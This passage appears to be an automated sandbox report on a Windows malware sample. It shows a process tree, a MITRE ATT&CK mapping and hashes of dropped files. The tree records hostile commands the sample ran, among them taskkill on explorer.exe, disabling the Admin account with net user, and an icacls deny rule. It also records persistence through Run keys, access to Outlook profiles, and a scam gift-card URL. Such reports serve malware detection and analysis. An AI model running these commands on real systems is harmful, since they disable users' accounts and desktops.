  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2104,8233652282319240420,5248754036411865068,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4716 /prefetch:8
      4⤵
      PID:3960
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2104,8233652282319240420,5248754036411865068,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4716 /prefetch:8
      4⤵
      PID:4508
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,8233652282319240420,5248754036411865068,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3812 /prefetch:1
      4⤵
      PID:6556
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,8233652282319240420,5248754036411865068,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6060 /prefetch:1
      4⤵
      PID:488
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2104,8233652282319240420,5248754036411865068,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6472 /prefetch:8
      4⤵
      PID:6792
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,8233652282319240420,5248754036411865068,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6484 /prefetch:1
      4⤵
      PID:3256
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,8233652282319240420,5248754036411865068,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6616 /prefetch:1
      4⤵
      PID:3992
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,8233652282319240420,5248754036411865068,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3684 /prefetch:1
      4⤵
      PID:4992
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2104,8233652282319240420,5248754036411865068,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=2828 /prefetch:8
      4⤵
      PID:7020
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2104,8233652282319240420,5248754036411865068,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3196 /prefetch:8
      4⤵
      Modifies registry class
      Suspicious behavior: GetForegroundWindowSpam
      Suspicious use of SetWindowsHookEx
      PID:2328
    - - C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        5⤵
        Modifies Installed Components in the registry
        Enumerates connected drives
        Checks SCSI registry key(s)
        Modifies registry class
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of SetWindowsHookEx
        
        PID:2196
      - C:\Users\Admin\Desktop\3.exe
        
        "C:\Users\Admin\Desktop\3.exe"
        6⤵
        Executes dropped EXE
        Modifies registry class
        Suspicious use of SetWindowsHookEx
        
        PID:928
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 928 -s 724
        7⤵
        Program crash
        
        PID:6628
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,8233652282319240420,5248754036411865068,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5836 /prefetch:2
      4⤵
      PID:5236
- - C:\Users\Admin\AppData\Local\Temp\vir_bde465e6-5de1-4597-81f0-c42072322b8d\jkka.exe
    jkka.exe
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:6648
  - - C:\Windows\SysWOW64\notepad.exe
      "C:\Windows\system32\notepad.exe"
      4⤵
      Drops startup file
      NTFS ADS
      PID:5932
    - - C:\Users\Admin\AppData\Roaming\appdata\sjhkhda.exe
        
        "C:\Users\Admin\AppData\Roaming\appdata\sjhkhda.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        
        PID:5244
      - C:\Users\Admin\AppData\Roaming\appdata\sjhkhda.exe
        
        "C:\Users\Admin\AppData\Roaming\appdata\sjhkhda.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Accesses Microsoft Outlook profiles
        Suspicious behavior: AddClipboardFormatListener
        Suspicious use of SetWindowsHookEx
        outlook_office_path
        outlook_win_path
        
        PID:4348
      - C:\Users\Admin\AppData\Roaming\appdata\sjhkhda.exe
        
        "C:\Users\Admin\AppData\Roaming\appdata\sjhkhda.exe" 2 4348 240747218
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:3380
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im fontdrvhost.exe
    3⤵
    - Kills process with taskkill
    PID:5852
- - C:\Users\Admin\AppData\Local\Temp\vir_bde465e6-5de1-4597-81f0-c42072322b8d\selfaware.exe
    selfaware.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:2932
  - - C:\Users\Admin\AppData\Local\Temp\vir_bde465e6-5de1-4597-81f0-c42072322b8d\selfaware.exe
      selfaware.exe
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Adds Run key to start application
      PID:6304
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Users\Admin\AppData\Local\77511e5d-9ef3-4d85-bc36-b2cb40bd6f0e" /deny *S-1-1-0:(OI)(CI)(DE,DC)
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:5084
    - - C:\Users\Admin\AppData\Local\Temp\vir_bde465e6-5de1-4597-81f0-c42072322b8d\selfaware.exe
        
        "C:\Users\Admin\AppData\Local\Temp\vir_bde465e6-5de1-4597-81f0-c42072322b8d\selfaware.exe" --Admin IsNotAutoStart IsNotTask
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:6100
      - C:\Users\Admin\AppData\Local\Temp\vir_bde465e6-5de1-4597-81f0-c42072322b8d\selfaware.exe
        
        "C:\Users\Admin\AppData\Local\Temp\vir_bde465e6-5de1-4597-81f0-c42072322b8d\selfaware.exe" --Admin IsNotAutoStart IsNotTask
        6⤵
        Executes dropped EXE
        
        PID:4220
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im explorer.exe
    3⤵
    - Kills process with taskkill
    PID:1448
- - C:\Windows\SysWOW64\net.exe
    net user Admin /active:no
    3⤵
    PID:2376
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 user Admin /active:no
      4⤵
      PID:6416
- - C:\Windows\SysWOW64\net.exe
    net user DefaultAccount /active:yes
    3⤵
    PID:5368
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 user DefaultAccount /active:yes
      4⤵
      PID:5788
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://mrbeast-giftcards-gaway.netlify.app/
    3⤵
    PID:5632
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa53ba46f8,0x7ffa53ba4708,0x7ffa53ba4718
      4⤵
      PID:6016
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy C:\Windows\Fonts C:\Users\Admin\Desktop
    3⤵
    - Enumerates system info in registry
    PID:2560
- C:\Users\Admin\AppData\Local\Temp\d5646294-a913-4787-986e-85d0374cf84b\packer.exe
  "C:\Users\Admin\AppData\Local\Temp\d5646294-a913-4787-986e-85d0374cf84b\packer.exe" "C:\Users\Admin\AppData\Local\Temp\d5646294-a913-4787-986e-85d0374cf84b\unpacker.exe" "C:\Users\Admin\AppData\Local\Temp\vir.exe" "!main.cmd" "C:\Users\Admin\AppData\Local\Temp\vir_bde465e6-5de1-4597-81f0-c42072322b8d" "" True True False 0 -repack
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:5852
- - C:\Users\Admin\AppData\Local\Temp\d5646294-a913-4787-986e-85d0374cf84b\ProgressBarSplash.exe
    "C:\Users\Admin\AppData\Local\Temp\d5646294-a913-4787-986e-85d0374cf84b\ProgressBarSplash.exe" -packing
    3⤵
    - Executes dropped EXE
    PID:6268
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5852 -s 1488
    3⤵
    - Program crash
    PID:6480

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:936

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4228

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5220

C:\Windows\system32\efsui.exe
efsui.exe /efs /keybackup
1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5836

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5124

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 3256 -ip 3256
1⤵
PID:4268

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x4f4 0x324
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3128

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall
1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:5228
- C:\Windows\system32\DrvInst.exe
  DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{4b69159b-a4e5-0747-94f3-0db9a654e532}\droidcamvideo.inf" "9" "41e7d49db" "000000000000014C" "WinSta0\Default" "000000000000015C" "208" "c:\program files (x86)\droidcam\lib"
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Checks SCSI registry key(s)
  - Modifies data under HKEY_USERS
  PID:5908
- C:\Windows\system32\DrvInst.exe
  DrvInst.exe "2" "231" "ROOT\MEDIA\0000" "C:\Windows\INF\oem3.inf" "oem3.inf:c14ce8845b5e8bf3:DroidCamVideo.Device:21.4.1.0:droidcamvideo," "41e7d49db" "000000000000014C"
  2⤵
  - Registers COM server for autorun
  - Drops file in Windows directory
  - Modifies registry class
  - Suspicious use of AdjustPrivilegeToken
  PID:2184
- C:\Windows\system32\DrvInst.exe
  DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{c3885fdc-5383-2e49-99c4-1aae5f8e5cae}\droidcam.inf" "9" "4e67c8bbf" "0000000000000160" "WinSta0\Default" "0000000000000158" "208" "c:\program files (x86)\droidcam\lib"
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Checks SCSI registry key(s)
  - Modifies data under HKEY_USERS
  PID:5788
- C:\Windows\system32\DrvInst.exe
  DrvInst.exe "2" "231" "ROOT\MEDIA\0001" "C:\Windows\INF\oem4.inf" "oem4.inf:ed86ca11f01d07d6:DroidCam_PCMEX:1.0.0.0:droidcam," "4e67c8bbf" "0000000000000160"
  2⤵
  - Drops file in Drivers directory
  - Drops file in Windows directory
  - Checks SCSI registry key(s)
  - Suspicious use of AdjustPrivilegeToken
  PID:2292

C:\Windows\SysWOW64\werfault.exe
werfault.exe /h /shared Global\0a21616cbffb4cae91d2328a468e468b /t 5004 /p 2280
1⤵
PID:2336

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:3764

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:3924

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5636

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1592

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:6800

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:6668

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5884

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4000

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3612

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 5852 -ip 5852
1⤵
PID:5072

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:6100

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1828

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
- Suspicious use of SetWindowsHookEx
PID:6692

C:\Windows\system32\fontdrvhost.exe
"fontdrvhost.exe"
1⤵
PID:1696

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 928 -ip 928
1⤵
PID:1568

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

File and Directory Permissions Modification

T1222

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Subvert Trust Controls

T1553

SIP and Trust Provider Hijacking

T1553.003

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\DroidCam\DroidCamApp.exe

Filesize
942KB

MD5
f8c12fc1b20887fdb70c7f02f0d7bfb3

SHA1
28d18fd281e17c919f81eda3a2f0d8765f57049f

SHA256
082f5c3fd2fd80505cbd4dbdbb7c50e83c2e81f033a04ea53832dbf0a3fc4933

SHA512
97c5d158abb119e076ace4b1398de19029b5d44566d9a293811bf7edbb0db120354cc396aed72bf62766799dc5db266d4b2ee7aee3ffc2818d8be77a4665ad2f

Download Submit
C:\Program Files (x86)\DroidCam\Uninstall.exe

Filesize
87KB

MD5
de2a97a1e50afa4fec443a8930606ddf

SHA1
4133434c37472ab14443704dd9ad8e8546f3098f

SHA256
5cf6e6e22cba884b20da6cf701546613792c15f30d4c27273a432fb185f29416

SHA512
d25e638a7925d0be5bbb081f5edda506603252916c3d3868d2bcdcc31484547efb893130a6b5eccc781bfece702c59d34fe67a84a48e379916fc15568adcdc49

Download Submit
C:\Program Files (x86)\rover\0001.wav

Filesize
3KB

MD5
e46ada50fe2981e420a2b3e612599fde

SHA1
947677aa7018cf80b46be1e5b1b16c7a5d29d55f

SHA256
42ccd491b946b345dbdadbe3f1a3288f24e630247259f034afb222eb30d5ecc1

SHA512
5e5669508f0d8395e2f7c808e88744e57b30482fe8396671eccdb9be4cb077f1eb8534a4c0ec40e675b4356eb36299134a26b5e46a5e148b08be981d7c75ae81

Download Submit
C:\Program Files (x86)\rover\Breath.wav

Filesize
6KB

MD5
c6bf51f165022883725aa60448753428

SHA1
870806d5f526bb527985ddf4bbe477aee454a511

SHA256
a7cb1954912b711624a47a35688eb044a272f14c80c923c1cb3dcf0c207c1b0a

SHA512
bf071d6b36bffdbc33867001ba5780d06a90d185ed2fac50f851acc0303b63dd0169950fc0a77f42cb4639fea7adaf67dbce6163e75fd6f8cafdc0b70c2676cb

Download Submit
C:\Program Files (x86)\rover\Come\Come.001.png

Filesize
2KB

MD5
8d0dfb878717f45062204acbf1a1f54c

SHA1
1175501fc0448ad267b31a10792b2469574e6c4a

SHA256
8cf6a20422a0f72bcb0556b3669207798d8f50ceec6b301b8f0f1278b8f481f9

SHA512
e4f661ba8948471ffc9e14c18c6779dba3bd9dcc527d646d503c7d4bdff448b506a7746154380870262902f878275a8925bf6aa12a0b8c6eb8517f3a72405558

Download Submit
C:\Program Files (x86)\rover\Come\Come.002.png

Filesize
2KB

MD5
da104c1bbf61b5a31d566011f85ab03e

SHA1
a05583d0f814685c4bb8bf16fd02449848efddc4

SHA256
6b47ad7fe648620ea15b9c07e62880af48a504b83e8031b2521c25e508aa0ef1

SHA512
a8e27abefb0f5bfffe15a19fd882b2e112687abe6ac4bbd5187036cb6058b0124d6ce76fc9227970c8fe2f5768aa0d1faa3319d33b1f42413e8bdfe2ce15296d

Download Submit
C:\Program Files (x86)\rover\Come\Come.004.png

Filesize
2KB

MD5
f57ff98d974bc6b6d0df56263af5ca0d

SHA1
2786eb87cbe958495a0113f16f8c699935c74ef9

SHA256
9508d82995364556a882c54306210e885868a8df2f2ad93485c14f88c9f9e1b7

SHA512
1d4ca268d1c98ac545008b079076609e18bfdf22cd31b7b75b9218d03c6edb37b245298ff717e48309ca862f973a4383b101e43732a162b4d7f78573612c64ea

Download Submit
C:\Program Files (x86)\rover\Come\Come.005.png

Filesize
2KB

MD5
7fb2e99c5a3f7a30ba91cb156ccc19b7

SHA1
4b70de8bb59dca60fc006d90ae6d8c839eff7e6e

SHA256
40436d5ab3589d33dae09b470ccacd369422d2569804cf1532e5946fc7e45535

SHA512
c0d83325928d629abba648360c8687091d18d52991297d69625ccd4617d4d5add4aa16c288cc408b26c79cd37decf5ee2198e8b87b67ef5b88802afae93fb51a

Download Submit
C:\Program Files (x86)\rover\Come\Come.006.png

Filesize
3KB

MD5
a49c8996d20dfb273d03d2d37babd574

SHA1
96a93fd5aa1d5438217f17bffbc26e668d28feaf

SHA256
f4c568336894b3140f0ca7005a5751ad5a860422290b2b6e23d72656160862b1

SHA512
9abb666891fa00ae77801fe9b3aab62bca37402197d22983e98d8442e6d890b1091a47dc1eca1ac68caa52a633bb60c8c3248de65056a6435f4affb98f401a30

Download Submit
C:\Program Files (x86)\rover\Come\Come.007.png

Filesize
3KB

MD5
e65884abe6126db5839d7677be462aba

SHA1
4f7057385928422dc8ec90c2fc3488201a0287a8

SHA256
8956643da83aa74bc89b4d71db7b470200863de230be647a6881d8f3f60df3ac

SHA512
7285b8acca0210a85dd4317a7beab161708544c4c25a742ce7284b545fa4953be89eb685e62f30fba56d6cb2fc806062ccdf4a0e62516eea047097c6856900c2

Download Submit
C:\Program Files (x86)\rover\Come\Come.008.png

Filesize
3KB

MD5
f355305ada3929ac1294e6c38048b133

SHA1
a488065c32b92d9899b3125fb504d8a00d054e0e

SHA256
37de9b0126ffa3967455083dd72ba70501b1e4c92ae25eb0667f840911585775

SHA512
6082003d98022597007623ff7cdece9d9a14ad19bf55ac35afb2277fe22378c865899a5b28b4b5828d0d48fb7859fea82886d98d8d3a3813413f1e864e3849b2

Download Submit
C:\Program Files (x86)\rover\Come\Come.009.png

Filesize
3KB

MD5
1d812d808b4fd7ca678ea93e2b059e17

SHA1
c02b194f69cead015d47c0bad243a4441ec6d2cd

SHA256
e4e2fe6652557dec0e703da7325808cab4722961398dc9bf9fdae36c1de8841d

SHA512
a8781c78d7d23f70f7450e749732d2909447cfa194d8e49a899c77f808e735878da8d838eecb4e8db7470d040800ae45f977d5f208bfad6c15d62d6456611e84

Download Submit
C:\Program Files (x86)\rover\Come\Come.010.png

Filesize
3KB

MD5
e0436699f1df69af9e24efb9092d60a9

SHA1
d2c6eed1355a8428c5447fa2ecdd6a3067d6743e

SHA256
eeae94fa4ddca88b0fefec2e449064ea1c6d4c8772762bb900dc7752b68706e4

SHA512
d6b4adf98c9deb784be1f775a138a7252b558b9d9443a8a3d1435043196738b1ea32439cd09c507d0e2a074a5ba2973e7ffce6c41b26e17460b7695428666cbf

Download Submit
C:\Program Files (x86)\rover\Come\Come.011.png

Filesize
3KB

MD5
f45528dfb8759e78c4e933367c2e4ea8

SHA1
836962ef96ed4597dbc6daa38042c2438305693a

SHA256
31d92998e8e9de48700039027a935b5de3242afd4938e6b10509dc87d84eb758

SHA512
16561ca527e2081519decbc0fb04b9955b398eb97db7a3d442500b6aefcb4e620bebd87d7c8ddad2cf940035710fc5a000b59d7ed5d0aa06f3af87e9eebcb523

Download Submit
C:\Program Files (x86)\rover\Come\Come.012.png

Filesize
3KB

MD5
195bb4fe6012b2d9e5f695269970fce5

SHA1
a62ef137a9bc770e22de60a8f68b6cc9f36e343b

SHA256
afa59cb80b91e29360a95746979be494bdee659d9b8bfad65782b474273d5e62

SHA512
8fbe3ca2950261d976b80efd6a8d36d4a47b445a3e4669e100ce8c5d2a1f692e7b40ab324494a6de7847861d99194e13344a84aa135e458924b95fadf3905fd4

Download Submit
C:\Program Files (x86)\rover\Come\Come.013.png

Filesize
3KB

MD5
3c0ef957c7c8d205fca5dae28b9c7b10

SHA1
4b5927bf1cf8887956152665143f4589d0875d58

SHA256
3e6a44a4e993d70a2f8409b4194fa15551d5f7a3651a5d1e74d3c6b640da08c7

SHA512
bf2a5dd182c7cce4f6d00a4a1738f3a777b61c612c2449716b0fa62c62570ca1c21ac0063c221923e5db3b4101a4e7e32e711c9bfa075a2949ea9fa2e51ca704

Download Submit
C:\Program Files (x86)\rover\Come\Come.014.png

Filesize
3KB

MD5
2445d5c72c6344c48065349fa4e1218c

SHA1
89df27d1b534eb47fae941773d8fce0e0ee1d036

SHA256
694d6774638b36148f7a1b14809a025a16895ad4ec8645a6db2fe9cd5f784dbb

SHA512
d8134a66845c71d633f56e5fd656d545f09dad82d18ec21a7415f825cb6c0634ed775008c6fdea83dfec95ce659144e6de806edac620f389fcc3064683c3a7b3

Download Submit
C:\Program Files (x86)\rover\Come\Come.015.png

Filesize
3KB

MD5
678d78316b7862a9102b9245b3f4a492

SHA1
b272d1d005e06192de047a652d16efa845c7668c

SHA256
26fab597e882c877562abea6b13557c60d3ed07fd359314cdc3a558f8224266b

SHA512
cb6154e67ea75612dddd426e448f78c87946b123ff7b81f3fc83444adac4692bb5f3a04038291d9df7e102a301e41541a10e709e8adfde376016d86de15087db

Download Submit
C:\Program Files (x86)\rover\Come\Come.016.png

Filesize
3KB

MD5
aa4c8764a4b2a5c051e0d7009c1e7de3

SHA1
5e67091400cba112ac13e3689e871e5ce7a134fe

SHA256
1da7b39ec5f3cad19dc66f46fee90c22a5a023a541eca76325074bee5c5a7260

SHA512
eea254f7327639999f68f4f67308f4251d900adb725f62c71c198d83b62aa3215f2ce23bd679fddde6ac0c40a5c7b6b04800bc069f2940e21e173b830d5762e2

Download Submit
C:\Program Files (x86)\rover\Come\Come.017.png

Filesize
4KB

MD5
7c216e06c4cb8d9e499b21b1a05c3e4a

SHA1
d42dde78eb9548de2171978c525194f4fa2c413c

SHA256
0083bb52df2830f2fc0e03ffa861728916e3f1a6db3560e66adbca9716318ee3

SHA512
6ffbcc1c6ad1a0c01a35fdbf14918dfc9e2026a3021e3b6d761d56f4006b4218ffc2278eb2f820ae54722cd0c35fde40ca715154f6e2ae6c24aef0724d0ed004

Download Submit
C:\Program Files (x86)\rover\Come\Come.018.png

Filesize
4KB

MD5
e17061f9a7cb1006a02537a04178464d

SHA1
810b350f495f82587134cdf16f2bd5caebc36cf5

SHA256
9049038f58e048cc509bcc51434119465c376700ec45bedfd1d8f45440bdc32a

SHA512
d5b899109a16195d3fdb8f23382b48bab70dfcd0c823a03a0cdc4e50501812fc644b938839c3346e8aabc2925ce3bdebffad07ef2f90d291663275ba3d225ab3

Download Submit
C:\Program Files (x86)\rover\Come\Come.019.png

Filesize
3KB

MD5
63dbf53411402e2a121c3822194a1347

SHA1
86a2e77e667267791054021c459c1607c9b8dbb6

SHA256
47b80b828244964005bd947b80958f3aa6372b843dc088e33fbbd35ab3f785c5

SHA512
4b4603d88bddcb86e4282dafd55d8f00b852464daab588a554db829af566d5aa6baa3d575c58b133276be22203c014de73c0c3e35bfbe53570c356ef47bb5a50

Download Submit
C:\Program Files (x86)\rover\Scrape.wav

Filesize
602B

MD5
749f9cb77d6a793059b1e5fc38ad03f1

SHA1
e034574b49dcf816a555cdb95b7b580347863f64

SHA256
28506bdfd9975f45e634460f62099ea1e8728c100db73770470669757ba60101

SHA512
bfe51f4a4f3f0b3bb64223e89fd0b12377c4bde15a7bbee5c5528d391fbe8911ee816f44731cb7a9b22aa9ec5853da622fcd3ee3e88281b15fd858f55ac5ac78

Download Submit
C:\Program Files (x86)\rover\Speak\Speak.001.png

Filesize
3KB

MD5
0197012f782ed1195790f9bf0884ca0d

SHA1
fc0115826fbaf8cefa478e506b46b7b66a804f13

SHA256
c999fa6fd26a4a2af2155bd05522b44b54d6df90d1a9703a288bdf18b623c2cc

SHA512
614bce1f761871ba1113de49217725b7b6661c703b03864cef736f44e2d1e0c5fbe133966d24afb15900f0e4da16b24000a2a638b6d7839848874f386b3b81c1

Download Submit
C:\Program Files (x86)\rover\Speak\Speak.002.png

Filesize
3KB

MD5
b45ff2750a41e0d8ca6a597fbcd41b57

SHA1
cf162e0371a1a394803a1f3145d5e9b7cddd5088

SHA256
